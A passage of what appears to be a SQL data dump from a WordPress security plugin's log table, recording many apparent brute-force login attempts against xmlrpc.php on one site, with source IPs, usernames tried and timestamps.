BgryWzdaQIfw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.171.24.51',3114997811,'techspt',0,1679917115.9552,152,'pEKVWAcG4uFNowODv1SayqL8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.0.217.116',2717964660,'techspt',0,1679917124.5214,152,'96prb3ygNqCLwPtfsEWi2nJz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.254.29.108',872291692,'',0,1679921656.6213,55,'ecv9MZjyuE48lKGUBPos37Nk','','19|0|0|0|cmdev-site1.com/wp-content/plugins/core-fork/index.php',0,19,0),('51.254.29.108',872291692,'',0,1679921730.6417,55,'BLUhNQXexzZTJv6jqFpSfCu4','','19|0|0|0|cmdev-site1.com/wp-content/plugins/core-stab/index.php',0,19,0),('51.254.29.108',872291692,'',0,1679921730.6450,10,'BLUhNQXexzZTJv6jqFpSfCu4','','707|0|0|0|cmdev-site1.com/wp-content/plugins/core-stab/index.php',0,707,0),('192.64.117.71',3225449799,'techspt',0,1679921909.2580,152,'17qxSkJ9TdnED4WueMc3ItvN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679921909.8568,152,'05lDxUCcJjNIXAw9o1ai3sq6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.58.111.21',3359272725,'techspt',0,1679921915.1438,152,'LrdtMce3yvEg5qn9RsNQwaGD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'techspt',0,1679921917.7315,152,'mNtbM1DIgBz8kSZVaJ3usOxL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('160.153.146.149',2694419093,'techspt',0,1679921918.5199,152,'IJmB8k237aKHDRSP1FbqsrC9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.89.16',1386567952,'techspt',0,1679921926.5217,152,'EgY3CdWLaNSeZVfnOiszRjMl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'techspt',0,1679921942.3613,152,'PUkvGZRlK1Iiep0smzgLM6Ty','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'',0,1679921942.3653,10,'PUkvGZRlK1Iiep0smzgLM6Ty','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('89.46.107.190',1496214462,'techspt',0,1679921948.1232,152,'9TJvA0ZG2q4n1Dtc5iagfmOr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679921952.6587,152,'shuBTrKqb1PwNUzEeiRAYoW6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'',0,1679921952.6613,10,'shuBTrKqb1PwNUzEeiRAYoW6','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('94.40.87.204',1579702220,'techspt',0,1679926652.8810,152,'Ej0nmDxsUypIMocbHlGBXqVO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.245.192.133',2650128517,'techspt',0,1679926653.7411,152,'9IzBUgOXyafeMTd26ixmFAS3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679926670.7996,152,'L0sUThZ1xJufrVkvjab4c7n6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.187.109.22',599485718,'techspt',0,1679926680.4708,152,'DLq1ksPgfKEnFpTBiMlIJctO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.231.59.72',3118938952,'techspt',0,1679926714.8868,152,'BvlNHAzU8WT0bg9pdt5ISC2u','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'techspt',0,1679926714.8871,152,'4DJRKAdGFX2EM3wHVQlnZSYu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679926720.6032,152,'eoME2Jt7u1GFBmbh65sSVidp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'',0,1679926720.6056,10,'eoME2Jt7u1GFBmbh65sSVidp','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('103.149.165.49',1737860401,'techspt',0,1679926721.3840,152,'R0smbn2V5itAZIODXgH6y4Cf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('69.174.53.190',1169044926,'techspt',0,1679926733.8311,152,'WDc6txsJri129hnkdRNby7OY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.41',3326602025,'techspt',0,1679931144.6893,152,'h6AUo5wM3j7icmRgBGlxzTse','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.119.84.18',762795026,'techspt',0,1679931148.3984,152,'OIZKAfUmT70nopXr4JHiVgbc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679931149.2026,152,'HZABg83T9EC1JyN6XptW5lMs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'techspt',0,1679931156.5728,152,'IJYV9NjFg7TdkmnBQh8fHxOs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.133.215.217',1736824793,'techspt',0,1679931178.3950,152,'f543hwrduU7ekNjmPHpFVRWq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.68.11.207',860097487,'techspt',0,1679931180.9847,152,'FMkubmnYZlg1x0vtRBzLreaJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'Melissa',0,1679932631.8276,7,'ACsEebDTWBjI4F0g9GZc8nxf','','40|0|0|0|cmdev-site1.com/wp-admin/admin-ajax.php',0,40,0),('198.71.231.8',3326600968,'techspt',0,1679934092.9208,152,'agWhpONlE9frvBnzFbV8q0uK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.23.50.101',85406309,'techspt',0,1679934093.4822,152,'zRTslvcUg6GbD3Mi5oqHNmtB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.106.145',1496214161,'techspt',0,1679934103.9077,152,'LKV8P5jbi03eRcyHWMhdOoxZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'techspt',0,1679934105.4472,152,'OTNEA8w23dQmD9kFRIP1v7nX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.14.102.253',2718852861,'techspt',0,1679934105.8358,152,'dFC0JgMw92EPZRSx1zj3cXUI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('203.205.21.58',3419215162,'techspt',0,1679934119.8035,152,'Hf6FP2GulxNwa3hro1OIgjEZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('94.40.87.204',1579702220,'techspt',0,1679934124.3466,152,'S9P4no0mxL6yXrOCNc7QWklg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'techspt',0,1679934128.9059,152,'Mzjfgv12Uc3V0hyt8olxqrQu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('96.231.235.203',1625811915,'techspt',0,1679939366.2731,152,'v7UhkQ8eVKySWEAzfgRmjJus','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.102.159.169',2506530729,'techspt',0,1679939366.4484,152,'u0TeQMWKa7UR5nJHAFfBjq3X','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.245.192.133',2650128517,'techspt',0,1679939366.7557,152,'fSZ7eR4nJqWbawVFctvgTL0C','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.245.57.130',2633316738,'techspt',0,1679939374.6729,152,'jUHgtqlPVnZT7WoaIsBXvN1F','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679939375.6594,152,'H7eR4tEYlFvBAmynpG0afqNi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679939386.6060,152,'gDWf1mONIA0LPBZ7CRcxT8qM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.117.83.240',24466416,'techspt',0,1679939394.8485,152,'XnfFUA9dLyqKTHkhJwOujlZQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.44.8.48',3391883312,'techspt',0,1679939395.0966,152,'o4NvP62mk8XxeRg1flLTtyzQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.227.108.223',1088646367,'techspt',0,1679939409.9784,152,'iDTQfpoNM2mBZguznvr7P308','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.210.185.4',1053997316,'techspt',0,1679939410.6297,152,'jqE1FLtdiJfN9rVkSU2nevmH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679939430.0336,152,'FR51HnbG3V2ilkEh6jONeQIX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'',0,1679939430.0373,10,'FR51HnbG3V2ilkEh6jONeQIX','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('64.225.22.79',1088493135,'techspt',0,1679939453.4427,152,'IrSEaYgH59tlD6CvP4wj3fNy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679942444.7410,152,'XsV3EDRwgM84yrJvL5I9H0q2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679942445.7399,152,'dEIpQnKNM9TFXc7Vs6Lmfx1Y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'',0,1679942445.7471,10,'dEIpQnKNM9TFXc7Vs6Lmfx1Y','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('167.71.226.185',2806506169,'techspt',0,1679942446.1059,152,'mHAEyLn03VsJNuWcR2ldaUQX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.77.81',1806978385,'techspt',0,1679942454.9203,152,'v7oONn26U0i4JkSlFzE9QxGc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('216.250.113.146',3640291730,'techspt',0,1679942459.5570,152,'ryhzSKjFCU7wINe8GHR02ZVY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.163.104.122',1604544634,'techspt',0,1679942466.3798,152,'8Tndk7SHB46s2rPjiY1oeCIG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1679942472.9019,152,'vC5cBi2elxXmSLYfoGawbRdZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.187.109.22',599485718,'techspt',0,1679942481.6631,152,'0F3XDLbQucEA2VplxSjioUnf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'techspt',0,1679942482.7588,152,'yws3mUJCuIh0MjqRxK25kN9d','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'techspt',0,1679942483.0133,152,'FgUXNoliRr3zAn7mwKY04QOa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('123.30.238.182',2065624758,'techspt',0,1679942493.6101,152,'BR0DgvknWrj3dyFUhXfpZS9K','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'techspt',0,1679948028.7141,152,'rOqEvpc4RylbgQGX0iotIMeB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1679948030.8703,152,'YfJUA9BPsknGyeNrCdQMq0bw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.106.145',1496214161,'techspt',0,1679948045.1925,152,'McWeGXdzQDyKBk7LlACJsj3t','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'techspt',0,1679948048.9266,152,'A7aiKvmnqH4JPEwzpy13sYFN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.16',3115727120,'techspt',0,1679948049.9194,152,'84wdoul9DLW3MnVvGZpFaHP0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.226.64',627171904,'techspt',0,1679948057.7776,152,'nDU61teFvIKmMsi3EqkjYfJx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.178.36.28',2947687452,'techspt',0,1679948057.7830,152,'12QqFPh8IyvpDOCn9NizjksE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'techspt',0,1679948062.0871,152,'vQgIiOrn3h6JTZYLx5N2PVDB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'',0,1679948062.0918,10,'vQgIiOrn3h6JTZYLx5N2PVDB','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('159.223.77.48',2682211632,'techspt',0,1679952446.2397,152,'N1JYDjtXknuQ93TFvr8ig0h2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'techspt',0,1679952447.0604,152,'xQB0ZljK4VmHaU8tACEvLSob','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.230.31',3326600735,'techspt',0,1679952448.8797,152,'BeDkF1cIGSjqxwAp5hmW0JO2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('114.132.219.217',1921309657,'techspt',0,1679952454.7992,152,'BvbrGhq50NHlyn9Ox7u2YoUc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1679952456.9775,152,'UB7rx19aiXwHGZSjt3DM5zCb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.68.251.115',1732574067,'techspt',0,1679952457.5085,152,'hrkFpzs4DY8EWxNbOAHG7aZC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'techspt',0,1679952463.0857,152,'WINR18yatOXqAe6sh7vzbSKP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.172.150.73',581736009,'techspt',0,1679952464.0918,152,'a3mVwt1oExrP0I2RGsB8jUeF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.170.72.254',1604995326,'techspt',0,1679955317.7210,152,'FBO0DXpxYnicqE98rt4PZWf7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'techspt',0,1679955317.7895,152,'tuTYjno58WVEqCsLcKSJMFrO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.243.11.71',3119713095,'techspt',0,1679955321.4458,152,'7OPiDkQrJ8HXBhu0ERqgGSZ1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.65.123.34',1145142050,'techspt',0,1679955326.8705,152,'QMkNfvwLsqdS1iuln6mPyac7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'techspt',0,1679955344.3394,152,'Tp8RjGSxUZbEm6hi9ct5swA1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.105.97.186',778658234,'techspt',0,1679955345.3378,152,'0oPMUSh8lFjdRgftQVXKbBvu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.64',1109230656,'techspt',0,1679955349.9273,152,'yj1iCPkaSDbQ59H43z8MNYFX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.71.226.185',2806506169,'techspt',0,1679961831.3072,152,'XsAHBbIJqloVKGNQgc95LwiM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.243.11.71',3119713095,'techspt',0,1679961831.8163,152,'MLCawoK9srE5YyqkUj6iQge3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.154.142.51',731549235,'techspt',0,1679961840.4303,152,'ZRfxX2SpqOAKm7etcWTa1swV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'techspt',0,1679961844.3831,152,'J2n09YaBKFPAem1UIi5MlxgQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.231.8',3326600968,'techspt',0,1679961859.0075,152,'xAfw0OzZFokKgImeXVRrb3an','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.232.250.88',3119053400,'techspt',0,1679961865.3587,152,'80NZT4OcY1FILqV7x6iCKUtP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('2.58.82.244',37376756,'techspt',0,1679961871.5717,152,'HGZS0wVteu5NvBr7aAli8LfX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.77.81',1806978385,'techspt',0,1679961872.5615,152,'rCUlZXEVcjNfLbGRk1hQOP7i','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'techspt',0,1679961873.0582,152,'iXDgzUFoaE4m5pKtNRGPAxSl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('94.40.87.204',1579702220,'techspt',0,1679965332.9876,152,'JN2AkRLl6UsznD8xPSh5yTGa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('193.141.65.220',3247260124,'techspt',0,1679965342.0002,152,'CQKFRyIfUHqXrZj5wBiA74Yc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('49.234.102.159',837445279,'Admin',0,1679965356.1585,152,'gL3kjA6xyDwnKcNCmYFbSW4p','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'Admin',0,1679965356.4356,152,'feCEzlZLuqOdbxa6nGv5BXtp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'admin',0,1679965365.2725,152,'OGlqK0rDkvWg5haVjPn7iCtE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'Admin',0,1679965366.6463,152,'oahglfYXsMtu09jHCRKwz1J6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'',0,1679965366.6490,10,'oahglfYXsMtu09jHCRKwz1J6','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('35.185.76.79',599346255,'Admin',0,1679965370.9414,152,'niOD1L3tpZvAklRE297TFdgh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'',0,1679965374.7235,71,'yq3o89eIZSTOV4MPUhrlg2xG','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('89.46.105.179',1496213939,'Admin',0,1679965376.4324,152,'tnCYvMVDI9AGpKrswfoSgQlx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'admin',0,1679965379.6776,152,'DznljEGAWyXYuJTmqId918Bo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.154.142.51',731549235,'AdMiN',0,1679965383.7059,152,'R8ftwqzkvLCAyg7H2Qjupcen','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.32.234.87',2552293975,'admin',0,1679969788.0301,152,'6FoK0f7vwrH14cLnQXmIMNGb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'enamad',0,1679969788.3766,152,'fk4KxvmCUTWleZHF1aurR5ct','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.9',1152553225,'Username',0,1679969796.2233,152,'3o12aqsOt7d4IxeCZfiDGHQw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('96.231.235.203',1625811915,'admini',0,1679969805.9731,152,'A8L42IUbVJ3Dtzj1c0WFxTNM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.38.45.49',908471601,'admin',0,1679969807.3523,152,'C2VuyjhdmkSpA5IxQwR6rgao','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'Admin',0,1679969807.3836,152,'TmJvjRpUhkeGaIoZrtPbfC4q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.140.92',1503890524,'admin',0,1679969814.7708,152,'xESfNuZ0Wd5XcA7vy8h2aUjF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.61.153.77',3107821901,'admin',0,1679969821.0389,152,'ixoufmIJOUCbKGNqzXRF26Pp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'admin',0,1679969821.5590,152,'CT4dXbAD3f9RELSlp0yhsPug','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'Admin',0,1679969821.8825,152,'hxo6l8UMXfYEF7qk24cBT0S3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'admin',0,1679969826.2754,152,'wgMUWcTeSd9kZyGVtDF4hnAp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('63.250.38.213',1073358549,'Admin',0,1679974149.9468,152,'84kiDWQI06TMcSYUmt1O7Zyf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'Admin',0,1679974154.9928,152,'ol1abcJ3HRhQ25TtdKs9rngU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.99.50',3098043186,'admin',0,1679974169.3116,152,'aHStZx4jOv0lqdhwzMp6cKXQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'admin',0,1679974174.8755,152,'21tNYQlWDLu4vIRmG9cHP8nC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.76.57.230',2420914662,'admin',0,1679974182.8849,152,'Ge5hLfWT1xKBsMj3rulniEbR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.138.189.25',3230317849,'Admin',0,1679974183.6653,152,'FzrsbtIRaYeZf87W6NnQ9dOS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('208.109.40.232',3496814824,'Admin',0,1679974185.3721,152,'DVxCby1O4GaqelR2Fopvgduh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.94.233.98',794749282,'admin',0,1679974209.8145,152,'ZEyPfRsSxTOkW2izhYJNlrQ9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.9',1152553225,'xrumertest',0,1679978566.7695,152,'xvSW8aARf6D1hQr43uUGzkLZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.208.59.155',1255160731,'admin',0,1679978567.5152,152,'7f8SbgWLqKraP0U5jEYZtRQv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.61.232.172',3393054892,'Admin',0,1679978570.8375,152,'IYAN1jUpZfv3SC9VRndXcPqO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'admin',0,1679978575.3777,152,'H4qPA8Eb3tzSQruwNgVUBX1s','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.178.47.143',2947690383,'admin',0,1679978595.1931,152,'b1oTX4dAYvl2PUiIQEWkD5gs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'test',0,1679978595.4088,152,'wrUQ2iavHVDF9ts6XhKqJRfM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.245.192.133',2650128517,'admin',0,1679978603.8092,152,'Mxl530cDPgGK7tdnO8Ie1E9Y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.154.142.51',731549235,'admin',0,1679981377.1835,152,'TayPVzZcpqk9jbAe3w0L7rsY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'Admin',0,1679981377.3460,152,'6JOrGUMPbKxl84tfuHwis9nW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.233.65.8',3270066440,'admin',0,1679981383.9131,152,'lhOoe2qAu3FVNXcZyCabJ419','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.210.185.4',1053997316,'test2',0,1679981386.7679,152,'gyt3DbdKL8o40uxUAnYa1eOB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.64.117.71',3225449799,'admin',0,1679981401.7563,152,'ryX9lmBvuWSUjsORZAqwF52p','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'admin',0,1679981406.6094,152,'qrEvUfGFjyWL5P0lbISTOK8R','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.227.167.13',1138992909,'test',0,1679986972.1478,152,'IoHNyQVRLGnlAZ4h8TUD1OS3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.125.60.21',2977774613,'wordpress',0,1679986973.1434,152,'7bcEfF91aT8MuHLXvsRpW0rd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'dermen',0,1679986973.1531,152,'duD30oxh9TvLRwZCJVFnNql6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.64',1109230656,'admin',0,1679986979.9844,152,'boEZq46FfhsnXz9VL2G0I1HY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.187.109.22',599485718,'admin',0,1679986981.5987,152,'AMuy7UXO9IPogwzbYhj0RT3l','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'admin',0,1679986991.8617,152,'cdN0kDT5urKESY8qfGmMHeF6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'Admin',0,1679986992.5135,152,'IVip0K7wMW3lyEnGefLTQgZ5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.187.109.22',599485718,'wwwadm',0,1679987001.4308,152,'CT7AqjmXpFsazlUwSkc2xvhH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.187.109.22',599485718,'',0,1679987001.4333,10,'CT7AqjmXpFsazlUwSkc2xvhH','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('164.92.115.99',2757522275,'admin',0,1679987001.4791,152,'Hczf6Cws7hZxKqnTpY23VJey','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.28.36.122',1729897594,'admin',0,1679987010.8521,152,'7AGZCnsjbf8hWkVK5MzoIQBl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'admin',0,1679987012.2722,152,'f45vKVLC9By7ichmUINuksWR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.85.137',1386567049,'test',0,1679991359.6859,152,'ICteLODYi4xANm9sW5o136jX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.41.217.33',2938755361,'admin',0,1679991360.0882,152,'ahsiD2gY7mMylOLJdW0VcSwQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.163.104.122',1604544634,'admin',0,1679991360.5043,152,'CKLh5csu8ANrvOxwzo2Xk1Wb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'degreed',0,1679991367.8410,152,'0Hc3GOSy1Ni7Btwr2JUFm95k','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.149.165.49',1737860401,'bayley',0,1679991369.8121,152,'PTwSGOWiI5rJ0zAELqM7Q2U6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('188.166.86.232',3165017832,'admin',0,1679991378.5004,152,'WjcgDUS5eHupdo8N2a6RLG3i','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.5.199',1556940231,'admin',0,1679995808.9588,152,'QmBH0fsixZFqpK8TNJRe3dwA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.189.162.27',96313883,'admina',0,1679995809.7320,152,'CwH8OcAxFtg9YhQIVpK4uZBs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'admin',0,1679995821.7893,152,'yoI0qweQhC2j75AgVdmHb8uM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'admin',0,1679995823.7375,152,'Fv240herVZ8IlMckgBuDTJo9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'admin',0,1679995840.2461,152,'lA9Lv6EjHgUOmw7ZnQT0dJtV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.185.76.79',599346255,'',0,1679995840.2482,10,'lA9Lv6EjHgUOmw7ZnQT0dJtV','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('162.0.232.117',2717968501,'admin',0,1679995840.8069,152,'hwSL